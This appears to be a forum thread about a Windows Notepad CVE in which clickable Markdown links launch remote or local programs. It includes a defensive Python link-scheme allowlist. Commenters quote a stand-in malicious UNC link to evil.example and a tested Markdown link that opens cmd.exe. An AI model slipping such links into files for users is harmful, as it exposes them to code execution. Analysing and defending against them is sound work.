One of the key advantages of UTF8 is that all ASCII content is effectively UTF-8. Having the BOM present reduces that convenience a bit, and a file starting with the three bytes 0xEF,0xBB,0xBF may be mistaken by some tools for a binary file rather than readable text.
I think you mean “the US chooses to completely ignore these issues and gets away with it because they defined the basic standard that is used, ASCII, way-back-when, and didn't foresee it becoming an international thing so didn't think about anyone else” :)
I thought it was EBCDIC /s
UTF-8 always has the same byte order,[5] so its only use in UTF-8 is to signal at the start that the text stream is encoded in UTF-8...
Not using a BOM allows text to be backwards-compatible with software designed for extended ASCII. For instance many programming languages permit non-ASCII bytes in string literals but not at the start of the file. ...
A BOM is unnecessary for detecting UTF-8 encoding. UTF-8 is a sparse encoding: a large fraction of possible byte combinations do not result in valid UTF-8 text.
That last one is a weaker point but it is true that with CSV a BOM is more likely to do harm than good.
> One particular English-speaking country…
The UK has issues with ASCII too, as our currency symbol (£) is not included. Not nearly as much trouble as non-English languages due to the lack of accents & such that they need, but we are still affected.
When I open something in Notepad, I don't expect it to be a possible attack vector for installing ransomware on my machine. I expect it to be text. It being displayed incorrectly is supposed to be the worst thing that could happen. There should be no reason to make Notepad capable of recognizing links, let alone opening them. Save that crap for VS Code or some other app I already know not to trust.
In fact, those were the good days, when a mere affair with your secretary would be enough to jeopardize your career. The pendulum couldn't have swung more since.
Oh, here is the file I just saved... I see that it now tells me to rob a bank and donate the money to some random cult I'm just learning about.
Let me make a web search to understand how to contact the cult leader and proceed with my plan!
(luckily LLMs were not a thing back then :) )
Is that so? I ran into problems pretty often with programs having trouble with non-ANSI characters.
I actually built a "dumb" alternative in Rust last week specifically to escape this. It’s a local-only binary—no network permissions, encrypted at rest, and uses FIPS-compliant bindings (OpenSSL) just to keep the crypto boring and standard.
It’s inspectable if you want to check the crate: https://github.com/BrowserBox/FIPSPad
The specific gap this fills is 'Defense in Depth' + compliance. OS-level encryption (like FDE) is transparent once you log in. If you walk away from an unlocked machine, FDE does nothing.
App-level encryption, however, ensures the specific sensitive notes remain encrypted on disk even while the OS is running and the user is authenticated.
It's also portable as it allows the encrypted blob to be moved across untrusted transports (email, USB, cloud) without needing to set up an encrypted container/volume on the destination.
For FIPS/NIST workflows, relying solely on the OS often isn't enough for the auditor; having the application control the keys explicitly satisfies the 'data protection' control regardless of the underlying storage medium.
...then I might as well ask what happens when I walk away from the encrypting editor while a file is still open. User error can happen with any encryption or security schema. Pointing out a truism is not an argument.
> It's also portable
So is encrypting files using a specialized tool. I don't need my editor to do this. The entire point of my criticism, and indeed the entire point of this thread, is that software that should focus on a narrow task, tries to do way too much, leading to problems.
Considering that walking away from an open editor means also walking away from an unlocked machine, the problem would be the exact same ;-)
"Problems ? No problems. Profit."
Regards (insert your favourite 3 letter agency or exploit sellers here)
Using FIPS mode can be insecure because the latest FIPS-compliant version can be years older than the latest non-FIPS one with all the updates.
The only time it makes sense to use the FIPS version is where there is a legal or contractual requirement that trumps security considerations.
There's no insecurity like compliant cybersecurity :)
To meet FIPS 140-3, I can't roll my own crypto; I have to use a validated module.
I actually only link OpenSSL on Linux, and then only if it's in FIPS-mode. On Windows (CNG) and macOS (CoreCrypto), I use the native OS primitives to avoid the dependency and keep the binary small.
Every text editor, if it survives long enough, will end up implementing a partial, bug-ridden version of Emacs.
Every text editor, including Emacs [...].
Although now I'm using 9front, Sam and Acme. I feel weird not using the keyboard, but at least I understood structural expressions for Sam/Acme really fast, first with 'Vis' and next under Acme. Oh, Acme can do mail and news and a bunch more... because it has had I/O since the beginning, you can plug anything into it, from commands to the text buffer to sockets. Even a crude HN client if you dare.
But so far as I can tell the bug isn't related to "network-aware rendering stack" or AI (as other people are blindly speculating)?
From MSRC:
>How could an attacker exploit this vulnerability?
>An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files.
Sounds like a bug where you could put a URL like \\evil.example\virus.exe into a link, and if a user clicks it, it executes virus.exe
You were never able to "click a link" in Notepad in the past.
Mixing responsibilities brings with it lots of baggage, security vulnerabilities being one of them.
Despite the scary words and score this wouldn't even be a vulnerability if people weren't so hard wired to click every link they see. It's not some URL parsing gone wrong triggering an RCE. Most likely they allowed something like file:// links which of course opens that file. Totally valid link, but the feature must be neutered to only http(s):// because people.
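The "only http(s)://" rule from the comment above as an added example of the mitigation (not Notepad's code, and not Microsoft's fix): a scheme allowlist applied to every Markdown link destination, which rejects UNC paths, drive-letter paths, file:// and any custom protocol handler. The regex, function names and the sample document are constructed for this example; the two non-HTTP targets are the ones quoted elsewhere in this thread.

```python
# Added example: allowlisting Markdown link destinations by URL scheme.
import re
from urllib.parse import urlsplit

# Only absolute web links may be opened; everything else is blocked.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed, deliberately simple matcher for [text](destination).
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^)\s]+)\)")


def classify_link_target(target):
    """Return ("allow" | "block", reason) for a Markdown link destination.

    Order matters: UNC and drive paths are rejected before URL parsing,
    because urlsplit() reports 'c' as the scheme of C:/Windows/... and no
    scheme at all for a \\\\host\\share path.
    """
    t = target.strip()
    if t.startswith(("\\\\", "//")):
        return "block", "UNC/network path"
    if len(t) > 1 and t[0].isalpha() and t[1] == ":" and t[2:3] in ("/", "\\"):
        return "block", "local drive path"
    scheme = urlsplit(t).scheme.lower()
    if not scheme:
        return "block", "no scheme (relative or local path)"
    if scheme not in ALLOWED_SCHEMES:
        return "block", "scheme %r not allowed" % scheme
    if not urlsplit(t).netloc:
        return "block", "web scheme without a host"
    return "allow", "absolute web link"


def scan_markdown(markdown):
    """List every link in a Markdown document with its verdict."""
    results = []
    for text, target in LINK_RE.findall(markdown):
        verdict, reason = classify_link_target(target)
        results.append({"text": text, "target": target,
                        "verdict": verdict, "reason": reason})
    return results


def blocked_targets(markdown):
    """Convenience: the destinations a viewer must refuse to launch."""
    return [r["target"] for r in scan_markdown(markdown) if r["verdict"] == "block"]


# Constructed sample document mixing a legitimate link with the kinds of
# destinations this thread discusses.
SAMPLE_MD = r"""
# Release notes
See the [docs](https://example.com/docs) and the [old docs](HTTP://example.com/v1).
[Click me](C:/Windows/System32/cmd.exe)
[share](\\evil.example\virus.exe)
[local](file:///C:/Windows/System32/cmd.exe)
[handler](constructed-scheme://run)
[relative](notes.md)
"""

if __name__ == "__main__":
    for r in scan_markdown(SAMPLE_MD):
        print("%-5s %-45s %s" % (r["verdict"], r["target"], r["reason"]))
```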
This is so 80s. Now we have systemd (svchost.exe), wayland (explorer) and a web browser (chrome). You don't need more.
Another in 2004: https://www.cve.org/CVERecord?id=CVE-2002-1377
Neither vim nor Notepad are purely for displaying text though.
Up until fairly recently, that's exactly all Notepad did.
Vim has those bugs because of bloat, and now Notepad does too. AI, Markdown, Spellchecker, etc, nobody asked for this bloat.
notepad was always a plain text editor. It had enough problems with unicode and what that means to be "plain text".
[1] (native GUI widgets? agggh)
But a few months ago, I gave 11 a shot on my gaming PC Windows partition, because 10 had reached end of life, and Minecraft refused to work on it at all, Minecraft then required the store login, without any recourse.
So I wiped out the Windows partition and decided Java Edition on Linux was good enough. My kids stopped playing Bedrock anyway. All the other games I cared about worked on Linux too.
For me, that's really just Rocket League, but that might die when EAC is added, so another toxic company might be out of my life soon. It'll be sad after 4k hours, but I expected the day to come the day Epic took over.
Sober for Roblox is good enough for occasional play with the kids.
And just 1 person at work is keeping Windows alive, hopefully they're going to retire soon.
Everyone has to prove their worth by involving more people in ever embiggening trainwrecks every quarter in this day and age just to maintain employment, and without tangibly threatening anyone else's while at it. That's where the features are coming from. That's what needs to be fixed. Which also goes way beyond engineering.
I read the cwe not cve, was wrong. It's still early in the morning...
> The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user.
I am certain you are mistaken. I couldn't find anything that hints at notepad running with elevated privileges.
In fact, if you enabled developer mode on your computer there's a registry key that gets set to run notepad as admin, it's: `runas /savecred /user:PC-NAME\Administrator “notepad %1”` in HKEY_CLASSES_ROOT-> * -> shell -> runas (new folder) -> (Default)
And, if I'm not totally mistaken, notepad also has the ability to reopen files as administrator, but I don't remember how to invoke it.
Regardless, notepad is a very trusted application and is often run as Administrator. Often it's more trusted than any other utility to modify system files.
I think that's a notepad plus plus feature. I had it offer to reopen itself as administrator when editing system files like HOSTS.
Sorry to say this, but Notepad was a very trusted application now. I cannot believe that such a core utility has a 8.8 CVE, it sounds like a joke tbh.
These are sad times.
https://learn.microsoft.com/en-us/answers/questions/3845356/...
You basically have to find the "execution alias" setting and disable notepad and you get the ole reliable :D
OLD POST:
This has hurt me specifically. Since I work without IDEs, no VIM, no vs code. On linux I use nano, on windows I use Notepad. I like the minimalism and the fact that I have absolute control, and that I can work on any machine without needing to introduce an external install.
Last couple of years notepad started getting more features, but I'm very practical so I just ignored them, logged out of my account when necessary, opted out of features in settings, whatever.
But now this moment feels like I must change something, we need a traditional notepad.exe or just copy it from a previous version, I'll try adding NOTEPAD.exe to a thumb drive and having that. But it's a shame that it breaks the purity of "working with what's installed".
I've since migrated to Linux 100% (outside of work) and whilst there are the odd annoyances, it's been a breath of fresh air compared to Windows. And I can have a good chuckle almost once a week these days with each new Windows consumer hostility coming across the HN front page.
Oh, a kindred spirit!
I too absolutely love the notion of the base install, and what can be done just by means of its already available toolset.
(Fun tidbit: Did you know Windows comes with a bare bones C# 5 toolchain, with csc.exe, and even vbc.exe and jsc.exe?)
Even with MSBuild 4. From the days when .NET Framework was an OS component and also the build tools (until Roslyn) were part of the Framework.
If you’re going to have a custom config, you might as well have a custom executable.
Not saying that spending the first days on a new project configuring your custom setup with the company's stack is bad, especially if you are categorizing as employee and are looking for a multi year long run. But I tend to do small contracts, 1 to 6 months, and starting right away is a nice boost.
Shh, please. If MS find out, they'll add a parrot to "improve" it.
now that llms exist I am learning with dotnet, that now comes with windows, (or at least it comes with winget, and you can install a lot of kosher software, which is almost as good as having it preinstalled.)
If I ever hop onto an older machine I'll use the gpt to see what I get, i recall there's vbscript, apparently a .net compiler+runtime, and I saw a js interpreter in very old OS too.
A big inspiration in this realm is FogBugz historical "Wasabi". Their idea of compiling to PHP and c# i think it was, because it's what most OS come with, and their corpo clients can use it as it. It's in a joel spolsky blog post somewhere.
Btw, nano is only 50/50 chance that's it's pre-installed. Learn some vim, will ya? ;)
Edit: Fedora has it available as "msedit". What a time to be alive.
What's your day job? Are you self employed?
I'd agree that recent features feel a bit unnecessary, but it does need to edit and write files - including system ones (going through however that is authorised). You could sandbox a lot of apps with limited impact, but it would make a text editor really useless. Least privilege principles work best when you don't need many privileges.
I didn't even know Notepad would render Markdown.
Notepad handily strips away all the custom link namings and formats that totally fuck the expected output of a simple copy and paste. That's a big part of its magic: its immunity to the choices of marketing teams and dud management.
And it's hard to believe now, but yes, support for Ctrl+S to save file was a notable feature because notepad itself didn't support that back then.
The year of the Linux desktop doesn't need to arrive - it just needs Windows to keep shipping.
After they added copilot I finally gave up and uninstalled it and switched to a one of the minimalistic clones of the good old notepad.exe
It didn't always take a long time to load, but often enough that it was noticeable and 'worrisome' for the future of Windows.
It reminds me of King of the Hill where Hank says "Can't you see you're not making Christianity better and you're only making rock music worse?"
And decided to jump in on some threads just as well.
As usual with modern Claudes and GPT-5s, the output repeats and overemphasizes jargon from the input tokens without clarifying or switching up the wording.
From https://msrc.microsoft.com/update-guide/vulnerability/CVE-20... (there are many collapsible elements on this page, and they're also just for term definitions, sigh)
What a fucking terrible page for someone unfamiliar with the site. the "Learn More" links will allow you to learn what the terms "CWE", "CVSS", "Product Status" mean, but not to learn more about this vulnerability...
Anyway, it's not related to CoPilot, but because Notepad makes links clickable now...
True, not related to CoPilot, but if I understand your conclusion right (which I'm not sure about), it's not _just_ that links are clickable now, it's because Notepad actually does something with the links. Otherwise it'd be a browser vulnerability, and Notepad couldn't seriously be blamed.
The actual RCE here would be in some other application that registers a URL handler. Java used to ship one that was literally designed to run arbitrary code.
I was there last year myself. Decades of “eh, it’s not that bad” to “nope no, no fuck this”.
You can also put a shortcut to a program on your desktop and - horror of horrors! - clicking the shortcut will execute the program! How crazy is that?
I get that some people don't want the markdown functionality in notepad (you can turn it off very easily, btw). But I don't understand why suddenly the idea of hyperlinks is being blasted as a terrible security vulnerability?
Surely there has to be more to this, in order to generate so much hubbub, than just people not understanding the basic concept of hyperlinks?
To be fair, over the years there have been sincere efforts to re-architect the OS with security, privacy, reliability for persistent storage, graphics, multi-tasking, multi-user, networking etc. But those efforts never caught up with the speed at which bloat was added.
At the heart, its design still has remnants that have the naivety of a stand-alone, stateless microcomputer that boots straight off a floppy after BIOS POST.
ftype txtfile=c:\windows\NOTEPAD.EXE %1
Edit: going with EmEditor; forgot that existed
Is it just a well informed guess or do people decompile these programs?
The moment Microsoft started adding crap to Notepad, we knew that it was only a matter of time before such a vulnerability cropped up.
but I do wish they had called it something else and kept notepad as txt only.
They spent the last few years entirely compromising their products rather than improving them.
They're all bundled with AI features (I absolutely don't need) and never in my life will I buy a mac for coding. My current laptop is HODL'ing and idk if this enshittification will end soon.
I am moving off onto an old desktop running Debian stable slowly as I don't really need a laptop. This also isolates me from a number of geopolitical and technology creep and lock-in related risks I have identified.
I'm currently running Ubuntu on this ancient thing (which I love actually), but I absolutely don't want Windows.
2. It costs an arm and a leg to replace parts on a Mac when you travel outside the United States. Replacing the keyboard on my first macbook cost the same as the actual price. I learnt my lesson. I don't need that Apple garbage in my life.
What should I do ?
I use qemu in a docker container for many Windows related things, partially because I don't want to keep a "real" Windows system running and partially because I don't want to let that OS run outside of a VM or container.
It depends on your security mindset and goals, but I think we're far into the world of VMs and containers all the way down.
With respect to memory, try it and see. Modern Linux is very good at memory management, since it powers the entire data center world. You can certainly overcommit memory with Docker containers easily without a problem.
I wonder though if there are more open and trusted modified Windows being developed out there because trying random modified Windows in team-os is not getting me some confidence
Thankfully I don't.
if there's really nothing more to this 8.8 RCE CVE than that, this will finally be the thing that makes me blackhole cve.org.
I saved this as test.md, opened it in notepad, clicked the link, and it popped open a command line:
[Click me](C:/Windows/System32/cmd.exe)
Can definitely go further than this; just a quick test.
To be fair, though, it's not just a click -> open/run. The user has to `ctrl+click` and will see the source of the link (at least I do).
[1] https://en.wikipedia.org/wiki/Esoteric_programming_language#...
> Windows Notepad
Disambiguation urgently needed.
Its job is to be robust, simple, and always available.
It's supposed to show you the symbols in markdown, not render them.
It is useful for opening potentially dangerous content in a 100% safe way, because "txt" should always be safe to inspect!
It is regularly used to open gigabyte-sized log files and the like, which it has to handle on machines with less free memory than that! Markdown rendering and similar features are fundamentally incompatible with this requirement because they require serialised parsing of the entire file instead of opening just tens of kilobytes at a time using memory mapping or whatever.
Notepad is also used to open files without taking a lock, allowing users to read files that are actively being written to. Again, incompatible with practically all parsing strategies.
The "new Notepad" is some dumbass executives pet project that overlaps with Visual Studio Code and is a shitty alternative to WordPad, which another dumbass executive axed for no good reason.
It's supposed to be a basic text file viewer / editor, not an alternative to WordPad or VS Code!
Not every app has to be everything for everybody.
We're in an era now where Calc.exe takes appreciable time to start and pops up HTTP web proxy authentication prompts on some networks.
It's just incredible to me the level of enshittification people just shrug off like it's nothing.
Just now, I'm trying to debug something in Visual Studio 2026. The debugger's "view list" control takes over 10 seconds to pop up a simple table of text.
Text! Tens of seconds! On a gaming/workstation PC!
Nobody at Microsoft thought this was a problem.
This should be treated as an all-out war.
The Microsoft of 2026 is insane and I have 40,000 ideas to improve things without being anticompetitive but I no longer want to work at that company for any amount of money.
Microsoft have been stagnating and letting business people steer product direction for about 30 years too long. MBAs don't know shit. Stop letting them lead product direction. Stop letting people who are not power-users of a product make decisions about that product. PERIOD. No more PMs who aren't advanced users who lived in the tool 8 hours a day for months in a previous role.
Promote people who think differently, ESPECIALLY IF THEY DO NOT FIT IN THE CULTURE AT MICROSOFT TODAY. Think about ways to innovate. Advance the computing landscape, god dammit. Why are terminals still textual? How the fuck have we not moved past this ancient paradigm? Look at Plan9 and adopt features that Plan9 pioneered, and pay zero attention to what customers will accept while doing it - you can change the shape of these features to make them palatable at a later stage of design (there's no reason these features need to be painful for anyone, but they can be--and should be--very secure and inherent, rather than opt-in.)
Just pull your flippin' head out of your ass, Microsoft. Holy shit.
To summarize, malicious Markdown files with custom schemes in URLs can trick users into executing arbitrary code. I honestly didn't know this was a "feature" of Notepad.
I guess that's my real problem here. The constant desire for feature bloat inevitably introduces potential vulnerabilities. In no world did I expect Notepad to have the ability under any circumstances to make network requests and execute arbitrary code.
Nor should I.
As an aside, this is why I violently despise Electron apps and anything that runs its own browser engine for a GUI. I just don't want that level of attack surface in any app that I use.
[1]: https://cybersecuritynews.com/windows-notepad-rce-vulnerabil...
This isn't an AI slop problem.
The application of tools is.
There must be something much worse than slop going on to get to this point.
People don't realise how much bloat this is. The new Snipping tool for instance is 449 MEGABYTES, whereas it used to be only a few KB in size. Same with Paint, Calculator etc - all bloated UWP apps.
UWP was a mistake, they should've stuck to win32, at least for core apps.
That's slop if you ask me. Even if it wasn't vibe coded, it now wants me to vibe use it. Who the hell wanted that.
Clicking unknown links is always a bad idea, but a CVE for that? I dunno....
Rewriting it to integrate AI and some bells and whistles recklessly and having a CVE is tragicomic if you ask me.
So yes, MS will likely denounce this as not their problem and move on.
But yeah, pedantic terminology aside, what a stupid stupid error. In notepad, of all things, reading text files should be safe. It reminds me of the WMF failure. "No you can't get a virus from playing a video" is what I would tell people. And then microsoft in their infinite wisdom said "Herp Derp, why don't we package the executable video decoder right in the video file. It will make searching for a codec a thing of the past" Sigh, smooth move microsoft, thanks for making a liar out of me.
Last month it was the term "supply chain attack" that was abused to describe a situation where some vulnerable dependency could be abused in a downstream component. I guess every weakness in the Linux kernel is now a "supply chain attack" because it was in the supply chain and there is an attack, never mind that the term was originally about e.g. the liblzma/xz situation (specific attacks on a supply chain component, with no other purpose than attacking a downstream vendor)
I know I can't stop language change but I am getting a bit tired of how many tech people (who know better) go along with fear term inflation
It'd be the same to upload a file to a web server that gets to be run by the said web server, except this time it's done with "notepad.exe"